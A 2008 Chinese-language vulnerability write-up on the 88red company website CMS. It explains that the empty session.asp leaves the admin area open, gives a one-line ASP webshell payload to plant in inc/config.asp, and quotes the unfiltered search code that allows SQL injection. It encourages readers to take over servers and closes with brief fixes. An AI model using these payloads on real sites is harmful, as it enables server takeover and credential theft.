揭露88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)漏洞
更新時間:2008年05月09日 13:28:34 作者:
88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)后門利用代碼,用88red做企業(yè)占的朋友可要注意了
很熟悉的,就是inc/config.asp里的,我們可以在這寫一句話入庫,當然如果有的系統(tǒng)抄襲88red,并且對留言進行過濾的話,我們在這個配置信息里寫入“”%><%execute request(“IloveHackerNoteBook”)%>'”然后就會把后面的東西全部“格式化”,最后留下了一句“<%execute request(“******”)%>”這樣的話,我們就連接/inc/config.asp或得webshell吧。呵呵,這些都是無稽之談,因為我說這些是建立在沒有密碼進去的時候,沒鑰匙你怎么進去偷錢?(破比方,見笑?。┠俏覀兛纯矗@個屋子的主人是怎么驗證你是他的親戚的?看文件頭有個session.asp,想必就是驗證“血緣”關系的東西了。嘿嘿,是朋友是敵人,看這個文件,沒這個文件誰都能進后臺了,大吃一驚的是……session.asp竟然為空。我不知道這個系統(tǒng)的作者是怎么寫的,那么要緊的文件吖!!??!好了好了,人家的門沒有上鎖,進去吧。如圖4

撬鎖工具,也沒強迫屋主,就這樣進了他的房間(大家千萬別真和我學著去偷錢拉?。┻@個比喻只是想讓大家形象點的了解驗證是非常嚴肅的問題。我們可以直接上網站去修改東西也能在本地提交修改,全部都是ok的,我們來測試一下,如圖5

我們先未授權來到信息參數(shù)設置,然后用一句話蓋掉當前“”%><%execute request(“IloveHackerNoteBook”)%>'”,結果如圖6

很成功的插進了一句話,接著就讓大家把服務器拿下來吧!3、搜索注入搜索注入,這個系統(tǒng)估計是那些剛會程序的人寫的,新的版本,真正靠自己的實力寫的代碼,過濾不嚴也不能利馬責怪人家,可能下一個版本會不錯,但是注入仍然存在,這個是事實,我們來看看這個事實的片斷代碼:
<% word=request("keyword") ‘客戶端獲取關鍵詞,注意沒過濾??! if word="" then ‘還不能是空的 response.write"<script language=javascript>alert('關鍵字不能為空');this.location.href='javascript:history.go(-1)';</script>" response.end end if set rs=server.createobject("adodb.recordset") sql="select * from news where title like '%"&word"%' order by id desc" rs.open sql,conn,1,1 ‘關鍵詞不為空,就能搜索了。 if rs.eof then response.write"<br><br><div align=center>沒有搜索到新聞</div><br><br>" else%>
對于搜索型注入大家可以使用NBSI等牛人編寫的工具注入,結果如圖7

系統(tǒng),這樣猜解到了賬號和密碼就能去后臺登陸了,雖然后臺沒驗證。小小的總結一下:這個系統(tǒng)雖然發(fā)布后有點火,我們也該讓程序高興是吧!鼓勵是種動力,否則我們小菜讀什么代碼呢?!總的來說,這個系統(tǒng)最嚴重的就是session.asp這個文件為空導致整個站不安全的。還有搜索型注入沒過濾好,導致攻擊者能任意獲取賬號和密碼從而威脅到網站的安全,還有,數(shù)據(jù)庫既然設置成了asa就得加個什么干擾的2進制數(shù)據(jù)庫進去,加載個nodown表,防止一句話如庫。我不上論壇,但我有博客:www.xshacker.com.cn,歡迎大家和我交流.
相關文章
google hack dat 又增加的一些比較新的數(shù)據(jù)
google hack dat 又增加的一些比較新的數(shù)據(jù)2007-01-01淺談SQL SERVER數(shù)據(jù)庫口令的脆弱性
淺談SQL SERVER數(shù)據(jù)庫口令的脆弱性...2007-01-01當備份數(shù)據(jù)庫不能用時.用郵件列表得到WEBSHELL!(圖)
當備份數(shù)據(jù)庫不能用時.用郵件列表得到WEBSHELL!(圖)...2007-01-01